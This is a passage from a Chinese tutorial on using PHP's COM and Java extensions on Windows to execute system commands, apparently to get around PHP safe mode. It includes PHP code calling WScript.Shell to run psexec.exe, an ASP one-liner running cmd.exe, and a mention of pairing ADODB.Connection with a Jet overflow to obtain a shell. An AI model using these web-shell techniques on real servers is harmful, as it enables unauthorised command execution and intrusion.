3、COM 和 .Net(Windows)函数的应用

COM（Component Object Model,组件对象模型）是微软开发的软件规范，它用于开发面向对象的、编译好的软件组件，它允许把软件抽象成为二进制的部件，主要运用于windows平台。

PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用方法类似于C++或Java中类的创建的语法，并把COM的类名作为参数传递到构造函数。例如使用在PHP中调用“WScript.Shell”执行系统命令：

$cmd=” E:/cert/admin/psexec.exe”;

if($com=new COM("WScript.Shell")) echo "yes";

if(!$cmd1=$com->exec($cmd))

{

echo "can not exec()";

}

if(!$cmd2=$cmd1->stdout())

{

echo "can not stdout()";

}

if(!$cmd3=$cmd2->readall())

{

echo "can not readall()";

}

echo $cmd3;

?>

图1是我写的一个执行psexec.exe的一个例子。

这段代码与ASP的<%=server.createobject("wscript.shell").exec("cmd.exe /c netstat –an”).stdout.readall%>的意思是一模一样的，当然，你也可以像ASP那样调用“ADODB.Connection”，利用这个组件结合jet2溢出漏洞，可能能够在PHP Saft mode=ON下拿到一个Shell。

//create the database connection

$conn = new COM("ADODB.Connection");

$dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");

$conn->Open($dsn);

//pull the data through SQL string

$rs = $conn->Execute("select clients from web");

…..

?>

.Net 函数只能运行在 PHP 5上，当然，它需要 “.Net runtime”的支持，而且这的PHP的一个实验性模块，功能还未齐全，所以在这就不讨论了。

4、Java()函数的应用

该方法适用于safe mode=on。要使用JAVA模块服务器必须事先安装Java虚拟机，而且在PHP安装配置的时候打开了with-java的选项，代码如下：

[JAVA]

;这是到php_java.jar的路径

;java.class.path = .\php_java.jar

;JDK的路径

;Java.home = f:\jdk1.3.0

上一页  [1] [2] [3] [4] [5] [6] 下一页